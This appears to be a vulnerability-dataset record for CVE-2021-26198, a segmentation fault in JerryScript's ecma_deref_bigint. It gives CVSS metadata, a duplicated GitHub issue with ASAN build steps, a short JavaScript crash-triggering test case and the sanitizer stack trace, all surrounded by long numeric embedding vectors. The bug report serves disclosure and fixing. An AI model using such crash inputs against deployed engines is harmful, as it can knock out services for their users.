0.03265603259205818, -0.006313447840511799, 0.011749708093702793, 0.00490917731076479, -0.02069856785237789, -0.008956555277109146, 0.005878701340407133, 0.016066398471593857, 0.015173819847404957, -0.0033317769411951303, -0.011995935812592506, -0.004293606150895357, -0.009633682668209076, 0.003025915240868926, 0.01335019152611494, -0.028439370915293694, 0.009679851122200489, -0.0002486328885424882, 0.014712141826748848, -0.013465611264109612, -0.015943283215165138, 0.009125837124884129, -0.0003207701083738357, 0.019528983160853386, -0.005032291170209646, -0.006775126326829195, 0.013596420176327229, -0.002412268193438649, -0.010026109404861927, 0.007044438272714615, 0.006644317414611578, 0.04545990377664566, 0.0009983788477256894, 0.003908874467015266, -0.013504084199666977, 0.014766004867851734, -0.01077248901128769 ]
CVE-2021-26198
2021-06-10T23:15:08.433000
An issue was discovered in JerryScript 2.4.0. There is a SEVG in ecma_deref_bigint in ecma-helpers.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4402" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4402
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var p = new Proxy(Function(), { get: function closure() { eval("o.p.y"); delete closure; return closure == arguments.callee && !(new String(undefined)); }}); Function.prototype.bind.call(p); ``` ###### Output ``` ReferenceError: o is not defined ASAN:DEADLYSIGNAL ================================================================= ==24756==ERROR: AddressSanitizer: SEGV on unknown address 0xbebebeb8 (pc 0x56782398 bp 0xff8c72d8 sp 0xff8c72b0 T0) ==24756==The signal is caused by a READ memory access. #0 0x56782397 in ecma_deref_bigint /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 #1 0x5677d2c5 in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1147 #2 0x567c10fc in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1742 #3 0x567c1e68 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1898 #4 0x5678385a in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:83 #5 0x567acb1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256 #6 0x567a7a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf774af20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #8 0x566473d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 in ecma_deref_bigint ==24756==ABORTING ``` Credits: Found by chong from OWL337.
SEVG in ecma_deref_bigint
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4402/comments
0
2021-01-02T14:29:48
2021-01-07T11:10:55Z
https://github.com/jerryscript-project/jerryscript/issues/4402
777,469,127
4,402
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEVG in ecma_deref_bigint Issue date: --- start body --- ###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var p = new Proxy(Function(), { get: function closure() { eval("o.p.y"); delete closure; return closure == arguments.callee && !(new String(undefined)); }}); Function.prototype.bind.call(p); ``` ###### Output ``` ReferenceError: o is not defined ASAN:DEADLYSIGNAL ================================================================= ==24756==ERROR: AddressSanitizer: SEGV on unknown address 0xbebebeb8 (pc 0x56782398 bp 0xff8c72d8 sp 0xff8c72b0 T0) ==24756==The signal is caused by a READ memory access. #0 0x56782397 in ecma_deref_bigint /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 #1 0x5677d2c5 in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1147 #2 0x567c10fc in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1742 #3 0x567c1e68 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1898 #4 0x5678385a in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:83 #5 0x567acb1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256 #6 0x567a7a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf774af20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #8 0x566473d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 in ecma_deref_bigint ==24756==ABORTING ``` Credits: Found by chong from OWL337. --- end body ---
2,156
[ -0.010715563781559467, -0.004018336534500122, -0.004855489823967218, 0.010452458634972572, 0.012230413034558296, 0.0029938200023025274, 0.0026629450730979443, 0.04155470058321953, -0.04665734991431236, 0.03339046239852905, -0.026932422071695328, 0.021335452795028687, 0.0026709181256592274, 0.01103447936475277, 0.030392656102776527, 0.05453456565737724, -0.030791299417614937, -0.005820209626108408, -0.021080320701003075, -0.011704201810061932, 0.01878412812948227, 0.004660154227167368, -0.021383289247751236, 0.02658161334693432, -0.03807852044701576, 0.023934613913297653, -0.006605539005249739, 0.004731909837573767, -0.018353592604398727, 0.027905113995075226, 0.006565674673765898, -0.002355988835915923, -0.02123977802693844, 0.0072234380058944225, 0.0265656691044569, 0.014080123044550419, 0.03165237233042717, 0.05153675749897957, -0.02395056001842022, -0.012094873934984207, -0.020075736567378044, -0.037408798933029175, -0.03980066627264023, 0.04911300167441368, -0.001697228872217238, 0.05230215564370155, 0.03664340078830719, 0.011393259279429913, -0.04723139852285385, 0.03374126926064491, 0.011433123610913754, -0.012645003385841846, -0.010603942908346653, -0.05048433691263199, 0.013801071792840958, -0.031014541164040565, 0.029260504990816116, 0.009639224037528038, 0.014646198600530624, 0.012788514606654644, 0.010396648198366165, 0.002802470698952675, -0.03485747426748276, 0.01637631468474865, 0.0005551124340854585, 0.051632434129714966, -0.02972293272614479, 0.002453656867146492, 0.006693240720778704, 0.015491324476897717, -0.004401035141199827, -0.012780542485415936, 0.05485348030924797, 0.03415586054325104, 0.014518632553517818, -0.006342433858662844, 0.01048434991389513, 0.016224831342697144, -0.011504880152642727, -0.02149491012096405, 0.00544947013258934, 0.029340233653783798, -0.0005292005371302366, 0.01245365384966135, 0.013370536267757416, -0.012748650275170803, -0.005652778781950474, -0.07335058599710464, -0.000962726422585547, -0.0162806399166584, -0.002985847182571888, 0.01455849688500166, -0.009974084794521332, 0.011369341053068638, -0.010715563781559467, 0.008610720746219158, -0.027251336723566055, -0.007028102409094572, -0.05427943170070648, 0.014143906533718109, 0.012700812891125679, 0.004145902581512928, -0.010731509886682034, 0.014239581301808357, -0.01068367250263691, 0.05297188088297844, 0.0024596364237368107, -0.029132938012480736, 0.05121784284710884, 0.1241857260465622, 0.005465415772050619, -0.018576832488179207, -0.03638826683163643, 0.010165434330701828, -0.01795494742691517, 0.029627257958054543, 0.009687061421573162, -0.02565675973892212, -0.010476376861333847, -0.003838946344330907, -0.014375120401382446, -0.012955945916473866, -0.009120985865592957, -0.0008715364965610206, -0.029164830222725868, 0.020075736567378044, 0.018895749002695084, -0.0010873028077185154, 0.018178189173340797, -0.013378509320318699, -0.08221644163131714, -0.023631645366549492, 0.00005998353663017042, -0.03619692102074623, 0.022754626348614693, -0.022308144718408585, 0.023264892399311066, 0.037887170910835266, -0.034347210079431534, -0.03868446126580238, -0.028973480686545372, -0.026597559452056885, 0.026948366314172745, 0.003850905690342188, 0.00005098289329907857, -0.002204504096880555, -0.01215068344026804, 0.04283036291599274, -0.039992015808820724, 0.00272473506629467, 0.0030894947703927755, 0.028000788763165474, 0.02141518145799637, -0.007319112773984671, 0.0343153178691864, 0.010771374218165874, 0.014327283017337322, 0.03862067684531212, -0.005046839360147715, -0.003749251365661621, -0.02312137931585312, -0.008530992083251476, -0.008865853771567345, -0.0048156254924833775, -0.035878002643585205, 0.029483746737241745, -0.0035240172874182463, 0.021335452795028687, 0.0070241158828139305, 0.025672703981399536, -0.010356783866882324, -0.012525409460067749, 0.017572248354554176, 0.01833764649927616, -0.033900726586580276, -0.017364954575896263, 0.018544942140579224, -0.01010962389409542, -0.0038808039389550686, -0.015523215755820274, -0.0003064579505007714, 0.008347615599632263, -0.0043013738468289375, 0.005194337572902441, 0.004305360373109579, -0.037153664976358414, 0.026772962883114815, -0.02741079404950142, 0.006940400693565607, -0.046561677008867264, 0.0029758810997009277, 0.001978273270651698, 0.034570448100566864, -0.016487935557961464, 0.04873030260205269, -0.0033027695026248693, -0.0249073076993227, -0.03594178706407547, -0.004285428207367659, -0.02683674730360508, 0.03524017333984375, -0.004735896363854408, -0.017747651785612106, -0.007972889579832554, -0.010691644623875618, -0.008523019030690193, -0.002961928490549326, 0.006079328246414661, -0.005493320990353823, -0.02688458375632763, 0.00040362754953093827, -0.0043651568703353405, 0.018576832488179207, -0.0395774245262146, 0.0025373720563948154, 0.005473388824611902, 0.017189549282193184, 0.016934417188167572, -0.012605139054358006, -0.004161848220974207, 0.021255724132061005, -0.014981059357523918, -0.03415586054325104, -0.006274664308875799, -0.04228820651769638, -0.011289611458778381, -0.021702205762267113, 0.022403819486498833, -0.02425353042781353, 0.007020129356533289, 0.012094873934984207, -0.023567862808704376, -0.02206895872950554, 0.012517436407506466, 0.03380505368113518, -0.018528996035456657, -0.00002736009264481254, -0.01028502732515335, 0.022882193326950073, 0.008076537400484085, -0.011520825326442719, -0.005632846616208553, -0.03654772788286209, -0.036101244390010834, -0.00869044940918684, 0.0267091803252697, -0.03619692102074623, 0.016647392883896828, -0.0020291004329919815, 0.024110019207000732, -0.0128682442009449, -0.016033481806516647, -0.024588391184806824, -0.03466612473130226, 0.0036097257398068905, -0.009663142263889313, 0.014989032410085201, 0.05118595063686371, -0.028750240802764893, -0.008499100804328918, 0.025337843224406242, 0.013163240626454353, -0.04260712116956711, 0.03830176219344139, 0.012876217253506184, 0.033071547746658325, -0.051728107035160065, 0.010117596946656704, 0.0029001387301832438, -0.03632448613643646, 0.040470387786626816, -0.03944985941052437, -0.010580024681985378, 0.02232409082353115, -0.034602340310811996, -0.005947775673121214, -0.03629259392619133, 0.018178189173340797, 0.00037024106131866574, -0.006944386754184961, -0.0028343622107058764, 0.0034363153390586376, 0.024397041648626328, 0.0482519268989563, -0.004488736856728792, 0.017412791028618813, 0.045509252697229385, -0.0035240172874182463, -0.007853296585381031, -0.025018928572535515, 0.003980465233325958, -0.01483754813671112, -0.01865656115114689, 0.024110019207000732, 0.014351201243698597, -0.009607331827282906, -0.016934417188167572, 0.005620887037366629, -0.005573050118982792, -0.012732705101370811, -0.010237189941108227, -0.03878013417124748, 0.006876617204397917, 0.004133943468332291, -0.05284431204199791, 0.0025592974852770567, 0.00016855186549946666, -0.008188157342374325, -0.018066568300127983, -0.0009368145256303251, 0.03708988428115845, -0.02192544750869274, -0.0026569655165076256, -0.02570459619164467, -0.022914085537195206, 0.00275264005176723, 0.040693629533052444, -0.004692045506089926, -0.028750240802764893, -0.008180185221135616, -0.03444288298487663, -0.020203301683068275, -0.040821194648742676, -0.0006722142570652068, 0.04008768871426582, 0.007478570565581322, -0.03686664253473282, 0.012326087802648544, -0.04040660336613655, -0.00019222138507757336, 0.014056204818189144, -0.04404224082827568, -0.04254334047436714, 0.008172212168574333, -0.02297786809504032, -0.03992823138833046, -0.01891169510781765, 0.006693240720778704, 0.01065975334495306, -0.006035477388650179, -0.0022523412480950356, 0.017221441492438316, -0.017875218763947487, 0.01096272375434637, 0.013250942341983318, -0.01131353061646223, 0.015395649708807468, 0.016145100817084312, 0.032720740884542465, 0.021080320701003075, 0.0010170417372137308, 0.018369538709521294, 0.0008386483532376587, 0.008012753911316395, 0.041395243257284164, -0.020027898252010345, -0.05182378366589546, -0.05437510833144188, 0.008977473713457584, -0.013928637839853764, 0.015491324476897717, -0.020729513838887215, 0.004024316091090441, 0.02678890898823738, 0.008491127751767635, -0.007095871958881617, 0.010843129828572273, -0.005202310625463724, -0.019724929705262184, -0.017269279807806015, -0.03603745996952057, 0.023998398333787918, 0.007937011308968067, -0.017492519691586494, -0.004357184283435345, -0.02131950668990612, 0.025497300550341606, 0.005393659695982933, 0.011943388730287552, 0.019996007904410362, -0.01951763406395912, -0.0012916080886498094, 0.006641417276114225, -0.042702797800302505, 0.017891164869070053, 0.026501884683966637, -0.021877609193325043, 0.045509252697229385, -0.004544547293335199, -0.00794498436152935, -0.010061786510050297, 0.01860872469842434, -0.038365546613931656, -0.04407413303852081, 0.008395452983677387, 0.03884391859173775, -0.025194332003593445, -0.024110019207000732, 0.030041849240660667, -0.04343630373477936, 0.014997005462646484, -0.03571854531764984, 0.008507072925567627, -0.006549729034304619, -0.0018317714566364884, 0.003946580458432436, -0.02605540305376053, -0.051504869014024734, 0.041395243257284164, 0.012007172219455242, 0.020952753722667694, -0.05035677179694176, -0.03721744939684868, -0.012581219896674156, 0.05169621855020523, 0.03297587111592293, 0.04050227999687195, -0.03479368984699249, -0.029085101559758186, 0.000734502449631691, -0.005804263520985842, -0.00556906359270215, 0.03954553231596947, 0.001989235868677497, -0.0024755822960287333, -0.007382895797491074, -0.006206894759088755, 0.023870831355452538, 0.02249949425458908, 0.004715964198112488, -0.04589195176959038, -0.007877214811742306, 0.03524017333984375, 0.043404411524534225, -0.0010344823822379112, -0.029037265107035637, -0.0034223629627376795, -0.015531188808381557, 0.005409605801105499, -0.027299175038933754, 0.03619692102074623, 0.022658951580524445, -0.018241971731185913, -0.019597362726926804, 0.0007838347228243947, -0.028686456382274628, -0.0702889934182167, -0.022658951580524445, 0.02473190426826477, 0.023312728852033615, -0.00658959336578846, -0.004540560767054558, -0.014654171653091908, -0.017875218763947487, 0.008666531182825565, 0.0008765195379965007, -0.018768182024359703, 0.006517837289720774, 0.035431522876024246, 0.011584608815610409, -0.008323696441948414, 0.010077732615172863, -0.005557104013860226, -0.023472188040614128, -0.012884189374744892, 0.049718938767910004, -0.012326087802648544, -0.02272273600101471, -0.010611915960907936, -0.0038927632849663496, 0.033294785767793655, 0.033071547746658325, 0.007315126247704029, 0.011528798379004002, -0.030584005638957024, 0.01280446071177721, 0.0027287215925753117, -0.01096272375434637, -0.0163284782320261, 0.006091287825256586, 0.02395056001842022, 0.001350408187136054, -0.03348613530397415, 0.05552320554852486, 0.023312728852033615, -0.008937609381973743, 0.010803265497088432, 0.0023659549187868834, 0.008427344262599945, 0.022993814200162888, -0.0024955144617706537, -0.00808052346110344, -0.037855278700590134, -0.03498503938317299, 0.009862464852631092, -0.007446678820997477, -0.029499690979719162, -0.01435917429625988, 0.027283228933811188, 0.017109820619225502, -0.004967110231518745, -0.05600157752633095, 0.023344621062278748, 0.005664737895131111, 0.024014344438910484, -0.03235398605465889, -0.026342427358031273, 0.0411401093006134, -0.016519827768206596, -0.028526999056339264, 0.0030077726114541292, -0.04812436178326607, -0.008658558130264282, -0.029005372896790504, -0.018449267372488976, -0.020554110407829285, -0.008491127751767635, 0.0007913092849776149, 0.030440492555499077, 0.044935207813978195, 0.0006313531775958836, -0.005058798473328352, -0.03297587111592293, 0.03996012359857559, 0.036483943462371826, 0.01567470096051693, -0.012294195592403412, 0.006462027318775654, -0.003886783728376031, -0.027331065386533737, -0.02119194157421589, -0.01529997494071722, -0.021686259657144547, 0.04812436178326607, -0.006322501692920923, 0.0008212076500058174, -0.01383296400308609, 0.024444879963994026, 0.004715964198112488, 0.00172613060567528, 0.01655171811580658, 0.06174205616116524, -0.02074545808136463, 0.02285030111670494, 0.0009168823016807437, 0.019756820052862167, -0.021287616342306137, 0.020171411335468292, 0.017795490100979805, 0.021813826635479927, -0.0024496703408658504, -0.013386481441557407, -0.02658161334693432, -0.0027466604951769114, -0.00763005530461669, -0.03807852044701576, -0.01763603277504444, 0.036228809505701065, 0.01908709853887558, -0.015706593170762062, 0.015052815899252892, 0.0021885582245886326, -0.012222439981997013, -0.022706789895892143, -0.03520828112959862, -0.02066572941839695, -0.00975881703197956, 0.0686306357383728, -0.047869227826595306, -0.0010733503149822354, 0.026677288115024567, 0.014789710752665997, -0.007020129356533289, -0.03288019821047783, -0.012708785943686962, 0.00473988289013505, -0.005764399189502001, -0.00157364911865443, -0.0036236783489584923, -0.008626666851341724, 0.02044248953461647, -0.022053012624382973, -0.010021922178566456, 0.03527206555008888, 0.002824396127834916, -0.027745656669139862, 0.01553916186094284, -0.019421959295868874, -0.008762205950915813, -0.03087102808058262, -0.0028821995947510004, -0.010077732615172863, 0.011170018464326859, 0.002786525059491396, 0.031811829656362534, -0.015068761073052883, -0.011409205384552479, 0.015834158286452293, 0.03559098020195961, -0.029148884117603302, 0.006860671564936638, 0.0024735890328884125, 0.001875622314400971, -0.025018928572535515, -0.013737289234995842, -0.0036814818158745766, -0.028750240802764893, 0.0015497304266318679, -0.00011236791760893539, 0.01624874956905842, -0.0042774551548063755, 0.025242168456315994, 0.04101254418492317, -0.046434108167886734, -0.006290609948337078, 0.017014145851135254, -0.03406018391251564, 0.004923259373754263, -0.012772569432854652, -0.006741078104823828, 0.02600756660103798, -0.04295792803168297, -0.0020430530421435833, -0.011018533259630203, 0.002170619321987033, 0.03887581080198288, 0.0025493314024060965, -0.010627862066030502, -0.010747455060482025, -0.022563278675079346, -0.002778552006930113, -0.01144906971603632, -0.017970893532037735, 0.002322104061022401, 0.004233604297041893, 0.03059994988143444, 0.004249550402164459, 0.02600756660103798, -0.005700616165995598, -0.005903924815356731, -0.002234402345493436, 0.018528996035456657, -0.024397041648626328, -0.012031090445816517, -0.030584005638957024, -0.011345421895384789, 0.005660751834511757, 0.013490129262208939, -0.01616104692220688, 0.034123968333005905, 0.008810043334960938, -0.009942193515598774, 0.022260308265686035, 0.004042255226522684, 0.002501494251191616, -0.00462028943002224, 0.03230614960193634, 0.040693629533052444, -0.023918669670820236, 0.010603942908346653, -0.037855278700590134, -0.008475181646645069, -0.010388675145804882, -0.006593579892069101, 0.016519827768206596, -0.024221638217568398, -0.0024715957697480917, -0.005369741003960371, -0.004094078671187162, 0.02705998718738556, -0.014853493310511112, -0.013920665718615055, -0.0027287215925753117, -0.009113012813031673, 0.001818815479055047, -0.025337843224406242, -0.028750240802764893, 0.0020291004329919815, -0.027506468817591667, 0.00958341360092163, -0.0049750832840800285, 0.03339046239852905, -0.01514849066734314, 0.01006975956261158, 0.024412987753748894, -0.004357184283435345, -0.04031093046069145, 0.0013733302475884557, -0.013737289234995842, -0.006792902015149593, 0.0015507270582020283, 0.009679088369011879, 0.03654772788286209, 0.011130154132843018, 0.023009760305285454, -0.027123771607875824, 0.03170020878314972, 0.01109826285392046, -0.015531188808381557, -0.020059790462255478, -0.04873030260205269, 0.0018507069908082485, -0.014510659500956535, 0.010572051629424095, 0.01610523648560047, 0.012573246844112873, 0.007921066135168076, -0.012286222539842129, 0.03524017333984375, 0.027283228933811188, -0.02162247709929943, 0.01166433747857809, -0.035527195781469345, 0.014056204818189144, -0.009312335401773453, -0.030663734301924706, 0.02367948181927204, 0.0036675292067229748, -0.01470998115837574, -0.007777553983032703, -0.025640813633799553, -0.0041897534392774105, -0.04078930243849754, -0.027171608060598373, 0.009846518747508526, -0.01720549538731575, -0.0016503881197422743, 0.024715958163142204, 0.003526010550558567, 0.014638225547969341, -0.022483548149466515, -0.022340036928653717, 0.012700812891125679, 0.006338447332382202, -0.03756825625896454, 0.0038409396074712276, -0.02390272356569767, -0.005672710947692394, -0.0036176987923681736, -0.04136335104703903, 0.0028403420001268387, 0.012365952134132385, -0.000003527069338815636, -0.00993422046303749, 0.005321904085576534, -0.02267489768564701, 0.016304560005664825, 0.005266093648970127, -0.04088497906923294, 0.005816223099827766, 0.015993617475032806, 0.007618096191436052, 0.014686062932014465, -0.009607331827282906, -0.00246760924346745, 0.007235397584736347, 0.02131950668990612, -0.020426543429493904, 0.03235398605465889, -0.021223831921815872, 0.0037891159299761057, 0.01848115772008896, 0.00458441162481904, 0.012621084228157997, 0.031811829656362534, 0.017970893532037735, 0.01028502732515335, -0.022228416055440903, 0.004225631710141897, 0.0005615904228761792, 0.005656765308231115, -0.03744069114327431, -0.034698016941547394, -0.01470998115837574, 0.012844325043261051, -0.0052621071226894855, -0.02744268625974655, 0.01943790540099144, -0.005700616165995598, 0.008523019030690193, -0.018800074234604836, 0.016615502536296844, -0.02705998718738556, 0.03190750628709793, -0.0058640604838728905, 0.003340640803799033, -0.0036316511686891317, -0.014893357641994953, 0.04158659279346466, -0.011130154132843018, -0.013761207461357117, -0.028128353878855705, 0.02031492255628109, 0.03162048012018204, 0.0005889972089789808, -0.030488330870866776, -0.02884591557085514, -0.000998106086626649, 0.007498502731323242, -0.031237781047821045, 0.031461022794246674, 0.03568665310740471, -0.012597166001796722, 0.003912695683538914, 0.009328280575573444, -0.0018038662383332849, -0.005481361877173185, -0.01269284076988697, -0.026151077821850777, 0.02302570454776287, -0.0032768575474619865, 0.03112616203725338, 0.0020291004329919815, -0.02167031355202198, 0.0014022319810464978, -0.004500696435570717, 0.019932223483920097, 0.007127763237804174, 0.02623080648481846, 0.021160049363970757, -0.02004384435713291, 0.006796888541430235, 0.021383289247751236, -0.030360763892531395, 0.0063982438296079636, 0.011329475790262222, 0.02779349312186241, -0.00664540333673358, 0.022037066519260406, 0.016934417188167572, -0.00971895270049572, -0.0274905227124691, -0.023009760305285454, -0.005728521384298801, -0.025369735434651375, 0.047869227826595306, -0.0010952757438644767, 0.014749845489859581, -0.02924455888569355, 0.028351595625281334, 0.006545742508023977, 0.010452458634972572, 0.004867448937147856, -0.007099858485162258, -0.024460826069116592, -0.045158445835113525, -0.009049230255186558, 0.0007639024988748133, -0.006290609948337078, -0.005321904085576534, 0.01908709853887558, 0.03064778819680214, -0.0012477572308853269, 0.040693629533052444, -0.03383694216609001, -0.0072234380058944225, 0.025242168456315994, -0.008802070282399654, -0.02442893385887146, -0.02648594044148922, 0.023711374029517174, -0.0015487337950617075, 0.02591189183294773, -0.03571854531764984, 0.010053813457489014, -0.01576240360736847, -0.023472188040614128, -0.05437510833144188, -0.005557104013860226, -0.017540358006954193, -0.033294785767793655, -0.013482156209647655, 0.0448395311832428, 0.0041419160552322865, 0.020697621628642082, 0.01304364763200283, -0.016471989452838898, 0.019055206328630447, -0.01795494742691517, -0.01983654871582985, -0.017939001321792603, 0.004536574240773916, -0.034474775195121765, 0.0018696426413953304, 0.017843326553702354, -0.02591189183294773, 0.0005045344005338848, -0.042926039546728134, 0.007442692294716835, -0.0007026108796708286, 0.0010255129309371114, -0.01575442962348461, -0.016966309398412704, -0.02937212586402893, 0.019358176738023758, 0.02859078161418438, -0.021128157153725624, -0.012987837195396423, -0.01097069587558508, -0.0061750030145049095, -0.010635835118591785, -0.008602747693657875, 0.011568662710487843, -0.014853493310511112, 0.00005288268221192993, -0.00217261235229671, 0.04873030260205269, 0.00869044940918684, 0.008825988508760929, 0.016440099105238914, 0.015044842846691608, 0.011185964569449425, -0.01455849688500166, -0.028271866962313652, -0.0001888578262878582, -0.023982452228665352, -0.01572253927588463, 0.013338644057512283, 0.009639224037528038, 0.05026109516620636, -0.021813826635479927, -0.013936610892415047, -0.02004384435713291, -0.0038429328706115484, -0.007203505840152502, -0.024524608626961708, -0.015921860933303833, 0.019996007904410362, -0.0026071348693221807, 0.04416980966925621, -0.025290006771683693, 0.013609722256660461, 0.03042454645037651, -0.023089488968253136, -0.017269279807806015, 0.001913493499159813, -0.010085705667734146, -0.009495711885392666, -0.024237584322690964, -0.030265089124441147, 0.01042056642472744, 0.0050867036916315556, 0.03524017333984375, 0.0009283433319069445, 0.0112098827958107, 0.013250942341983318, 0.029101047664880753, -0.000021598432795144618, 0.035431522876024246, 0.00399441784247756, -0.02946780063211918, -0.019932223483920097, -0.0033366542775183916, -0.026422156020998955, 0.0020749445538967848, 0.0141598517075181, -0.02013951912522316, 0.00008776407776167616, -0.03288019821047783, 0.028957534581422806, -0.011241774074733257, 0.014327283017337322, -0.017939001321792603, -0.013609722256660461, 0.002168626058846712, 0.013657559640705585, -0.024110019207000732, 0.022292200475931168, -0.02513054758310318, -0.0361650288105011, -0.015594972297549248, 0.01107434369623661, 0.03514449670910835, 0.00678492896258831, -0.013561885803937912, 0.0027207485400140285, 0.031142106279730797, -0.01632050611078739, 0.0037691835314035416, 0.0013972489396110177, -0.003233006689697504, -0.029802661389112473, 0.029005372896790504, 0.015092680230736732, 0.015818214043974876, -0.02608729526400566, 0.028909698128700256, -0.014638225547969341, -0.023822994902729988, -0.003428342519327998, 0.0022782532032579184, -0.0035439494531601667, 0.007897146977484226, -0.036930423229932785, 0.0006831769715063274, 0.013362563215196133, -0.01983654871582985, -0.0020629852078855038, -0.03724934160709381, -0.005915883928537369, 0.011775958351790905, -0.006418175995349884, 0.022961921989917755, -0.010851102881133556, -0.039290402084589005, 0.007271275389939547, -0.004329279065132141, 0.025018928572535515, -0.019932223483920097, -0.0017321102786809206, -0.026772962883114815, -0.016998201608657837, 0.034570448100566864, -0.0027705791871994734, 0.02066572941839695, -0.013139322400093079, -0.01453457772731781, 0.01966114528477192, 0.03238587826490402, 0.033996403217315674, -0.023520024493336678, -0.011600554920732975, -0.00300976587459445, -0.008921663276851177, 0.005453456658869982, 0.016471989452838898, -0.012541355565190315, 0.006027504801750183, 0.01996411569416523, -0.0020789310801774263, 0.01394458394497633, 0.006924454588443041, 0.015060788951814175, -0.0027805452700704336, -0.00660952553153038, -0.03734501451253891, 0.009176796302199364, -0.018098460510373116, -0.02929239720106125, 0.006741078104823828, 0.04423359036445618, -0.0003156765887979418, -0.0038788109086453915, 0.010667726397514343, -0.01690252684056759, -0.0025951755233108997, 0.011520825326442719, -0.0018825986189767718, 0.012047036550939083, -0.017285224050283432, 0.02315327152609825, -0.015547134913504124, 0.04499898850917816, -0.018417375162243843, 0.006613512057811022, -0.009607331827282906, -0.018401429057121277, -0.029053209349513054, 0.006366352550685406, 0.024062180891633034, -0.006338447332382202, -0.002110822591930628, -0.019198717549443245, -0.006222840398550034, -0.019629254937171936, -0.03313532844185829, 0.008802070282399654, 0.01725333370268345, 0.0017998798284679651, 0.013896746560931206, 0.008682477287948132, 0.0188160203397274, 0.0018118391744792461, 0.00020480359671637416, 0.007319112773984671, -0.036356378346681595, -0.0017769577680155635, -0.008267886936664581, 0.0001532289752503857, -0.0049272459000349045, 0.007853296585381031, -0.00004045618698000908, -0.02385488525032997, 0.04665734991431236, -0.01370539702475071, -0.01061988901346922, -0.028096463531255722, -0.0037293191999197006, 0.001024516299366951, -0.017540358006954193, -0.019724929705262184, -0.008937609381973743, -0.011401232331991196, 0.023280838504433632, 0.015092680230736732, -0.005186364520341158, -0.012254331260919571, 0.08132347464561462, -0.011177991516888142, -0.007016142830252647, -0.019469795748591423, -0.029085101559758186, -0.0019832563120871782, 0.009192741475999355, 0.006382298190146685, 0.019581416621804237, -0.027044041082262993, 0.0215905848890543, 0.006155070848762989, 0.001752042560838163, 0.0016155068296939135, 0.011520825326442719, 0.012158656492829323, -0.024444879963994026, -0.005907911341637373, 0.03667529299855232, 0.0011211875826120377, 0.014877412468194962, 0.016966309398412704, 0.019756820052862167, -0.011193936690688133, 0.01642415300011635, 0.0014819608768448234, -0.026278644800186157, -0.012924054637551308, -0.027984842658042908, -0.0018058595014736056, 0.0008605737821199, 0.012078927829861641, -0.019118988886475563, -0.00527406670153141, -0.018800074234604836, 